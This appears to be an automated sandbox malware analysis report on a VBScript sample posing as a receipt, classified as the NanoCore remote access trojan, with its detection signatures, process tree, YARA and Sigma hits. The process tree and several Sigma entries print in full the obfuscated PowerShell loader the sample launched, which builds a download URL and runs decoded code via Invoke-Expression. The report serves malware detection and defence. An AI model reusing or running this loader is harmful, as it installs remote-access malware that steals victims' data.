Play interactive tour

Edit tour

Windows Analysis Report 14 Items receipt.vbs

Overview

General Information

Sample Name:	14 Items receipt.vbs
Analysis ID:	483205
MD5:	a47a00103d35b883f7edbc91398ad40b
SHA1:	72c41b1fb3565c5499a9ca5191e178c85ecceb90
SHA256:	13e48ac9a85c335c0a27a9c13b1878150764d47523907ea1e12a6218d7ff57d6
Tags:	NanoCoreRATvbs
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: NanoCore

VBScript performs obfuscated calls to suspicious functions

Detected Nanocore Rat

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Very long command line found

Injects a PE file into a foreign processes

Creates an undocumented autostart registry key

Sigma detected: CrackMapExec PowerShell Obfuscation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sigma detected: Encoded PowerShell Command Line

Java / VBScript file with very long strings (likely obfuscated code)

Detected TCP or UDP traffic on non-standard ports

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 740 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\14 Items receipt.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 3184 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

aspnet_compiler.exe (PID: 6012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

aspnet_compiler.exe (PID: 5192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
14 Items receipt.vbs	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x30:$s1: POwerSheLL

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Run\New.vbs	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x30:$s1: POwerSheLL

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.852066137.000001E92ABE5000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x41b0:$s1: POwerSheLL 0x5a70:$s1: POwerSheLL
00000001.00000002.851319653.000001E92A949000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x9670:$s1: POwerSheLL
00000001.00000003.850032751.000001E92A945000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xd670:$s1: POwerSheLL 0x17fa8:$s1: POwerSheLL 0x25478:$s1: POwerSheLL 0x285c8:$s1: POwerSheLL 0x29e08:$s1: POwerSheLL 0x2b598:$s1: POwerSheLL
00000001.00000003.850431281.000001E92A96B000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x25c8:$s1: POwerSheLL
00000001.00000002.852419198.000001E92C690000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x118:$s1: POwerSheLL
00000001.00000002.851342619.000001E92A954000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x8fa8:$s1: POwerSheLL 0x16478:$s1: POwerSheLL
00000001.00000002.851386898.000001E92A96C000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x15c8:$s1: POwerSheLL
00000001.00000003.850214818.000001E92A953000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x9fa8:$s1: POwerSheLL 0x17478:$s1: POwerSheLL 0x1a5c8:$s1: POwerSheLL 0x1be08:$s1: POwerSheLL 0x1d598:$s1: POwerSheLL
00000001.00000002.851469736.000001E92A97A000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1da8:$s1: POwerSheLL
00000001.00000003.850267004.000001E92A948000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xa670:$s1: POwerSheLL
00000001.00000003.849051938.000001E92C691000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x9b0:$s1: POwerSheLL 0x2242:$s1: POwerSheLL
Click to see the 6 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 5192, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: CrackMapExec PowerShell Obfuscation

Show sources

Source: Process started

Author: Thomas Patzke: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spli

Sigma detected: Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spli

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spli

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132761044297860302.3184.DefaultAppDomain.powershell

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49755 version: TLS 1.0

